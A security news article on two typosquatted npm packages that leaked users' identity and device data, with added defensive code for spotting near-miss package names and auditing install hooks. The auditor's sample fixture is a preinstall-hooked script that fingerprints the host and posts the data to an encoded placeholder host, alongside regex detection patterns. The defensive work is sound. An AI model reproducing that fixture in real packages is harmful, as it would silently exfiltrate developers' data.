Typosquatters Use Two Malicious NPM Packages to Steal User Data
- By Dawna M. Roberts
- Published: Oct 08, 2020
- Last Updated: Mar 18, 2022
Last week Sonatype, a software supply chain security company, reported two malicious packages it had found in the npm (Node Package Manager) registry, the main download repository for JavaScript components. When installed, they expose usernames, IP addresses, and device fingerprint data online.
What Happened?
The culprits used typosquatting to hide the packages among legitimate open-source components on the popular developer resource. The two packages, named “electorn” and “loadyaml,” were meant to catch developers who mistyped the name of a legitimate package when installing or searching for it; the registry then delivered the malicious look-alike, which went to work as soon as it was installed.
Open Source Exposes a Wide Victim Pool
Open source code is wildly popular, especially in developer circles. Because of this, it provides a vast playground for nefarious threat actors to test new variants of their malicious code on unsuspecting victims looking for free downloadable resources.
What is Typosquatting?
Typosquatting is the practice of registering a name that is a typo away from something legitimate and waiting for people to stumble into it. Sometimes criminals create fake websites that mimic a real site under a name that is just one or two letters off, so anyone who mistypes the address into the URL bar ends up somewhere dangerous instead of where they intended to be. The same trick works in package registries: a developer looking for the “electron” package might type “electorn” by mistake and install the malicious package instead.
Criminals use typosquatting to plant malicious code in software repositories, hoping that unsuspecting victims will either not notice the misspelling or assume it was a mistake by the original developer and install the package anyway. In this case, both packages were laced with malicious code that, when installed, exposed the user’s IP address, geolocation data, username, and device fingerprint data online for anyone to see.
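The near-miss check a registry, a CI gate, or a developer’s pre-install hook could run on a package name, written for this article as an added example (it is not Sonatype’s detection code). It uses optimal string alignment distance, which counts an adjacent-character swap as one edit, so “electorn” is one edit from “electron” rather than two. `KNOWN_PACKAGES` is a constructed allowlist for illustration; a real deployment would use the registry’s most-downloaded names.

```javascript
// Added example for this article, not code from Sonatype or from the packages discussed.
// KNOWN_PACKAGES is a constructed allowlist; in practice use the registry's top names.
const KNOWN_PACKAGES = ["electron", "lodash", "js-yaml", "yaml", "express", "react"];

// Optimal string alignment distance: Levenshtein edits plus adjacent transposition,
// so a swapped pair ("or" -> "ro") costs 1 instead of 2.
function osaDistance(a, b) {
  const m = a.length;
  const n = b.length;
  const d = Array.from({ length: m + 1 }, () => new Array(n + 1).fill(0));
  for (let i = 0; i <= m; i++) d[i][0] = i;
  for (let j = 0; j <= n; j++) d[0][j] = j;
  for (let i = 1; i <= m; i++) {
    for (let j = 1; j <= n; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // transposition
      }
    }
  }
  return d[m][n];
}

// npm names are case-insensitive and squatters also play with separators,
// so compare lowercase with "-", "_" and "." stripped.
function normalizeName(name) {
  return name.toLowerCase().replace(/[-_.]/g, "");
}

// Returns null when the name IS a known package or nothing is close enough;
// otherwise the closest known package and the edit distance to it.
function findTyposquatTarget(name, known = KNOWN_PACKAGES, maxDistance = 2) {
  const candidate = normalizeName(name);
  if (candidate.length < 4) return null; // very short names give too many false hits
  let best = null;
  for (const pkg of known) {
    const target = normalizeName(pkg);
    if (target === candidate) return null; // exact match: it is the real package
    const distance = osaDistance(candidate, target);
    if (distance <= maxDistance && (best === null || distance < best.distance)) {
      best = { target: pkg, distance };
    }
  }
  return best;
}

for (const name of ["electorn", "electron", "loadashs", "some-unrelated-package"]) {
  console.log(name, "->", JSON.stringify(findTyposquatTarget(name)));
}
```

The exact-match test sits inside the loop so the order of the allowlist does not matter, and the length floor keeps four-letter names from matching every other four-letter name. A hit is a reason to pause and compare the two packages’ authors and histories, not proof by itself: a distance of 2 also catches legitimate forks and plugins, which is why the usage note in a gate should ask for confirmation rather than silently block.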
The NPM Issue
The packages were live on npm during August and September. By September 30th they had been discovered, but not before the four packages had been downloaded about 400 times. Along with “electorn” and “loadyaml,” there were two other packages, “loadashs” and “loadyml,” which the author removed before they could be flagged as malicious.
The npm registry removed the remaining two packages, and GitHub confirmed that it also removed the GitHub page associated with them.
Both malicious packages shipped an innocuous index.js containing only skeleton code. The real payload was wired up in package.json, whose install-time script hook launched an update.js file that collected data about the user and device and posted it as a comment on a live, publicly readable GitHub page. The data was automatically deleted after 24 hours, so it is not clear what the attacker’s endgame was. Perhaps it was just a test.
After investigation, the researchers confirmed that the code went to some lengths to obfuscate its API endpoints and URLs. If you want the nitty-gritty technical details, Sonatype’s write-up has all the specifics.
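A pre-install check that targets exactly the layout just described: a lifecycle hook in package.json launching a separate script that fingerprints the host and sends the result out, with encoded strings as a secondary signal for the hidden endpoints. This is an added example written for this article; it is neither code from the malicious packages nor Sonatype’s tooling. The package.json and file contents below are constructed stand-ins that mimic the described structure, not the real artifacts, and `example.com` appears only as a base64-encoded placeholder.

```javascript
// Added example for this article: a static audit of an npm package before installation.
// Not Sonatype's code and not the real malicious files. SAMPLE_PACKAGE_JSON and
// SAMPLE_FILES are constructed stand-ins mimicking the layout the article describes.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare", "prepublish", "prepublishOnly"];

// Heuristic source indicators. Each hit is a reason for a human to look, not proof of malice.
const SOURCE_INDICATORS = [
  { id: "os-fingerprint", re: /\bos\.(userInfo|hostname|networkInterfaces|platform|release|cpus)\s*\(/ },
  { id: "outbound-http", re: /\bhttps?\.(request|get)\s*\(|\bfetch\s*\(/ },
  { id: "child-process", re: /\brequire\(\s*['"]child_process['"]\s*\)/ },
  { id: "string-obfuscation", re: /\bBuffer\.from\([^)]*['"]base64['"]\s*\)|\\x[0-9a-f]{2}/i },
];

// Files a lifecycle command launches directly, e.g. "node update.js" -> ["update.js"].
function scriptTargets(command) {
  const targets = [];
  const re = /\bnode\s+([^\s;&|]+)/g;
  let m;
  while ((m = re.exec(command)) !== null) targets.push(m[1]);
  return targets;
}

// pkg: parsed package.json; files: map of file name -> source text from the tarball.
function auditPackage(pkg, files) {
  const scripts = (pkg && pkg.scripts) || {};
  const hooks = LIFECYCLE_HOOKS.filter((h) => typeof scripts[h] === "string")
    .map((h) => ({ hook: h, command: scripts[h], targets: scriptTargets(scripts[h]) }));

  const findings = [];
  for (const [file, source] of Object.entries(files || {})) {
    for (const { id, re } of SOURCE_INDICATORS) {
      if (re.test(source)) findings.push({ file, id });
    }
  }

  // "block": an install-time hook launches a file that both fingerprints the host and
  // talks to the network, the exfiltration pattern the article describes.
  // "review": hooks or indicators exist but not in that combination. "ok": neither.
  const hookedFiles = new Set(hooks.flatMap((h) => h.targets));
  const has = (file, id) => findings.some((f) => f.file === file && f.id === id);
  const exfilFromHook = [...hookedFiles].some((f) => has(f, "os-fingerprint") && has(f, "outbound-http"));

  let verdict = "ok";
  if (exfilFromHook) verdict = "block";
  else if (hooks.length > 0 || findings.length > 0) verdict = "review";
  return { hooks, findings, verdict };
}

// Constructed sample mimicking the described layout (skeleton index.js, hook in
// package.json, data-collecting update.js). Nothing here is ever executed by the audit.
const SAMPLE_PACKAGE_JSON = {
  name: "electorn",
  version: "1.0.0",
  main: "index.js",
  scripts: { preinstall: "node update.js" },
};
const SAMPLE_FILES = {
  "index.js": "module.exports = function () {};\n",
  "update.js": [
    "const os = require('os');",
    "const https = require('https');",
    "const info = { user: os.userInfo().username, host: os.hostname(), ifaces: os.networkInterfaces() };",
    "// 'ZXhhbXBsZS5jb20=' is base64 for the placeholder example.com, standing in for a hidden endpoint",
    "const host = Buffer.from('ZXhhbXBsZS5jb20=', 'base64').toString();",
    "const req = https.request({ hostname: host, method: 'POST', path: '/' });",
    "req.end(JSON.stringify(info));",
  ].join("\n"),
};

console.log(JSON.stringify(auditPackage(SAMPLE_PACKAGE_JSON, SAMPLE_FILES), null, 2));
```

On the sample this returns verdict “block”, with the preinstall hook, its target update.js, and three indicators on that file. To run it against a real package, fetch the tarball without installing anything (`npm pack <name>` does that) and feed the extracted files in; set `npm config set ignore-scripts true` so lifecycle scripts never run unreviewed on your machine. A regex scan like this is a screening step that tells you which file to read first, not a substitute for reading it.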
When Did This Take Place?
The original packages were uploaded to the platform around August 17-24 and began collecting data. The first exposed details appeared on GitHub on August 25th.
By August 18th, Sonatype’s malicious code detection bots had flagged the packages as potentially dangerous. By September 30, Sonatype had notified both npm and GitHub, and by October 1, 2020, both the packages and the accompanying page had been removed.
Sonatype’s malicious code detection bots use machine learning to monitor update signals, code commits, and developer patterns to identify suspicious packages and authors. Sonatype’s primary focus is software supply chain protection.
The Larger Problem
Sadly, Sonatype also reported a 430% year-over-year increase in attacks on open-source software and noted that it is “virtually impossible to manually chase and keep track of such components.” What makes these attacks so alarming is that cybercriminals are proactively injecting malicious code into open-source components that feed the global software supply chain, on which organizations everywhere now depend.
Sonatype further explained that “By shifting their focus ‘upstream,’ such as with open-source malware in ‘electorn,’ bad actors can infect a single component, which will, and in this case probably has been, then be distributed ‘downstream’ using legitimate software workflows and update mechanisms.”
Sonatype notified developers whose software supply chain was affected and gave them instructions on how to remove the packages and safely update their software.
What Can Be Done About It?
This latest incident should serve as a reminder that no place online is safe, and attackers can reach you anywhere. Whenever you download any type of software, open-source or not, keep antivirus/anti-malware software running on your machine to inspect and clean infections, but treat it as one layer only: an install script that quietly collects and uploads data is not something a signature scanner will reliably catch.
Additionally, keep in mind these other tips:
- Be very careful where you download open-source packages from, and check spelling character by character: copy the exact package name from the project’s official page rather than typing it from memory, and if you notice a typo in a package name, move on to the next one.
- Research the package before installing it: look at the author, version history, download counts, the linked repository, and reviews. A few minutes of checking can prevent exposure of your data to identity theft or fraud.
- Read package.json before installing and be wary of preinstall and postinstall scripts, which run automatically during installation; npm’s ignore-scripts setting stops them from running unreviewed.
- Install and keep running antivirus/anti-malware software on all your devices and run deep scans often.
- Be on the lookout for phishing or other scams.
- Don’t click links in unexpected emails; go to the site directly instead.
Regardless of industry or the type of software developers use, extra precautions are needed to keep servers, supply chains, and endpoints free of viruses and malware.